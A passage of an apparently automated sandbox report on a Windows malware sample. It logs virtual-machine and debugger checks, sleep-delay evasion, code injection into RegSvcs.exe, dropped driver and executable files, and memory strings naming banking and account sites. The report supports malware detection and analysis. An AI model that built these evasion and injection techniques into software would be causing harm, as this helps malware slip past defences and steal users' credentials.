                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  barindex
                  Yara detected AntiVM3
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3656, type: MEMORYSTR
                  Contains functionality to detect sleep reduction / modifications
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeCode function: 26_2_004E128026_2_004E1280
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeCode function: 26_2_004E129026_2_004E1290
                  Query firmware table information (likely to detect VMs)
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeSystem information queried: FirmwareTableInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599890
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599777
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599656
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599547
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599434
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599324
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599215
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599079
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598966
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598844
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598719
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598608
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598500
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598390
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598281
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 459
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 2524
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6308
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3364
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDropped PE file which has not been started: C:\ProgramData\Dllhost\WinRing0x64.sysJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDropped PE file which has not been started: C:\ProgramData\Dllhost\winlogson.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\LOK6C9E3IK9GW8BSQQ492.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\main\7z.dllJump to dropped file
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeAPI coverage: 9.6 %
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeAPI coverage: 5.1 %
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeCode function: 26_2_004E129026_2_004E1290
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exe TID: 7936Thread sleep time: -180000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe TID: 7872Thread sleep time: -40000s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1820Thread sleep count: 6308 > 30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1824Thread sleep count: 3364 > 30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1868Thread sleep time: -5534023222112862s >= -30000s
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeLast function: Thread delayed
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_0011C148 FindFirstFileExW,0_2_0011C148
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_0011C1F9 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_0011C1F9
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_0011C148 FindFirstFileExW,3_2_0011C148
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_0011C1F9 FindFirstFileExW,FindNextFileW,FindClose,FindClose,3_2_0011C1F9
                  Source: C:\Users\user\AppData\Local\Temp\LOK6C9E3IK9GW8BSQQ492.exeCode function: 9_2_004031DC FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,9_2_004031DC
                  Source: C:\Users\user\AppData\Local\Temp\LOK6C9E3IK9GW8BSQQ492.exeCode function: 9_2_0040367D GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,9_2_0040367D
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 13_2_00F97978 FindFirstFileW,FindFirstFileW,free,13_2_00F97978
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeCode function: 26_2_004EA151 FindFirstFileExW,26_2_004EA151
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 13_2_00F9881C free,free,GetLogicalDriveStringsW,GetLogicalDriveStringsW,free,free,free,13_2_00F9881C
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 13_2_00F9B5E0 GetSystemInfo,13_2_00F9B5E0
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeThread delayed: delay time: 40000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599890
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599777
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599656
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599547
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599434
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599324
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 30000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599215
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599079
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598966
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598844
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598719
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598608
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598500
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598390
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598281
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\main\Jump to behavior
                  Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
                  Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                  Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                  Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\main\extractedJump to behavior
                  Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\Jump to behavior
                  Source: RegSvcs.exe, 0000001C.00000002.1720402344.0000000000402000.00000020.00000400.00020000.00000000.sdmpBinary or memory string: Vmwaretrat
                  Source: Amcache.hve.6.drBinary or memory string: VMware
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1422927299.0000000005713000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696497155
                  Source: RegSvcs.exe, 0000001C.00000002.1720402344.0000000000402000.00000020.00000400.00020000.00000000.sdmpBinary or memory string: vboxservice
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1422927299.0000000005713000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
                  Source: Amcache.hve.6.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1593568614.0000000002FB5000.00000004.00000020.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000002.1595588307.0000000002FB6000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 0000001A.00000002.1666986072.0000000000F19000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 0000001A.00000002.1666986072.0000000000EC4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: Installer.exe, 0000001A.00000002.1666986072.0000000000EFA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                  Source: RegSvcs.exe, 0000001C.00000002.1725907416.0000000006340000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllE=
                  Source: RegSvcs.exe, 0000001C.00000002.1720402344.0000000000402000.00000020.00000400.00020000.00000000.sdmpBinary or memory string: Vmwareuser
                  Source: Amcache.hve.6.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1422927299.0000000005713000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696497155
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1422927299.0000000005713000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696497155x
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1422927299.0000000005713000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1422927299.0000000005713000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1422927299.0000000005713000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696497155d
                  Source: Amcache.hve.6.drBinary or memory string: vmci.sys
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1422927299.0000000005713000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696497155x
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1422927299.0000000005718000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696497155p
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1422927299.0000000005713000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696497155}
                  Source: Amcache.hve.6.drBinary or memory string: VMware20,1
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1422927299.0000000005713000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1422927299.0000000005713000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696497155u
                  Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Generation Counter
                  Source: Amcache.hve.6.drBinary or memory string: NECVMWar VMware SATA CD00
                  Source: Amcache.hve.6.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                  Source: Amcache.hve.6.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1422927299.0000000005713000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696497155f
                  Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                  Source: Amcache.hve.6.drBinary or memory string: VMware PCI VMCI Bus Device
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1422927299.0000000005713000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696497155
                  Source: Amcache.hve.6.drBinary or memory string: VMware VMCI Bus Device
                  Source: Amcache.hve.6.drBinary or memory string: VMware Virtual RAM
                  Source: Amcache.hve.6.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1422927299.0000000005713000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1422927299.0000000005713000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696497155s
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1422927299.0000000005713000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
                  Source: Amcache.hve.6.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1422927299.0000000005713000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696497155j
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1422927299.0000000005713000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696497155t
                  Source: Amcache.hve.6.drBinary or memory string: VMware Virtual USB Mouse
                  Source: Installer.exe, 0000001A.00000002.1666986072.0000000000F19000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin
                  Source: Amcache.hve.6.drBinary or memory string: VMware, Inc.
                  Source: Amcache.hve.6.drBinary or memory string: VMware20,1hbin@
                  Source: Amcache.hve.6.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                  Source: Amcache.hve.6.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.6.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1422927299.0000000005713000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696497155]
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1422927299.0000000005713000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1422927299.0000000005713000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696497155o
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1593568614.0000000002FB5000.00000004.00000020.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000002.1595588307.0000000002FB6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWm5
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1422927299.0000000005713000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155
                  Source: PqSIlYOaIF.exe, 00000003.00000002.1595473812.0000000002F8C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: Amcache.hve.6.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.6.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1422927299.0000000005713000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1422927299.0000000005713000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696497155h
                  Source: Installer.exe, 0000001A.00000002.1666398916.00000000004FC000.00000004.00000001.01000000.00000009.sdmp, Installer.exe, 0000001A.00000003.1666103048.0000000003482000.00000040.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000001C.00000002.1722768807.0000000003001000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000001C.00000002.1720402344.0000000000402000.00000020.00000400.00020000.00000000.sdmpBinary or memory string: vboxtray
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1422927299.0000000005713000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696497155
                  Source: Installer.exe, 0000001A.00000002.1666986072.0000000000EFA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin`
                  Source: Amcache.hve.6.drBinary or memory string: \driver\vmci,\driver\pci
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1422927299.0000000005713000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696497155
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1422927299.0000000005713000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696497155
                  Source: Amcache.hve.6.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: RegSvcs.exe, 0000001C.00000002.1720402344.0000000000402000.00000020.00000400.00020000.00000000.sdmpBinary or memory string: Vmtoolsd
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1422927299.0000000005713000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
                  Source: Amcache.hve.6.drBinary or memory string: VMware-42 27 c7 3b 45 a3 e4 a4-61 bc 19 7c 28 5c 10 19
                  Source: Amcache.hve.6.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1422927299.0000000005713000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696497155t
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1422927299.0000000005713000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696497155}
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1422927299.0000000005713000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696497155x
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_0043BF80 LdrInitializeThunk,3_2_0043BF80
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_001122AA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_001122AA
                  Source: C:\Users\user\AppData\Local\Temp\LOK6C9E3IK9GW8BSQQ492.exeCode function: 9_2_00402665 LoadLibraryA,GetProcAddress,GetNativeSystemInfo,9_2_00402665
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_0013218D mov edi, dword ptr fs:[00000030h]0_2_0013218D
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_00064B90 mov edi, dword ptr fs:[00000030h]0_2_00064B90
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_00064B90 mov edi, dword ptr fs:[00000030h]0_2_00064B90
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_00064B90 mov edi, dword ptr fs:[00000030h]0_2_00064B90
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_00064B90 mov edi, dword ptr fs:[00000030h]0_2_00064B90
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_00068AD3 mov edi, dword ptr fs:[00000030h]0_2_00068AD3
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_00068AD3 mov edi, dword ptr fs:[00000030h]3_2_00068AD3
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_00064B90 mov edi, dword ptr fs:[00000030h]3_2_00064B90
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_00064B90 mov edi, dword ptr fs:[00000030h]3_2_00064B90
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_00064B90 mov edi, dword ptr fs:[00000030h]3_2_00064B90
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_00064B90 mov edi, dword ptr fs:[00000030h]3_2_00064B90
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeCode function: 26_2_004EB52D mov eax, dword ptr fs:[00000030h]26_2_004EB52D
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeCode function: 26_2_004E6B54 mov eax, dword ptr fs:[00000030h]26_2_004E6B54
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_00118870 GetProcessHeap,0_2_00118870
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_001122AA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_001122AA
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_0010B5BF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0010B5BF
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_0010B636 SetUnhandledExceptionFilter,0_2_0010B636
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_0010B642 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0010B642
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_001122AA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_001122AA
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_0010B5BF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_0010B5BF
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_0010B642 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0010B642
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeCode function: 26_2_004E20FF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,26_2_004E20FF
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeCode function: 26_2_004E2262 SetUnhandledExceptionFilter,26_2_004E2262
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeCode function: 26_2_004E5E89 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,26_2_004E5E89
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeCode function: 26_2_004E2375 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,26_2_004E2375
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guard

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Allocates memory in foreign processes
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write
                  Contains functionality to inject code into remote processes
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_0013218D GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,0_2_0013218D
                  Encrypted powershell cmdline option found
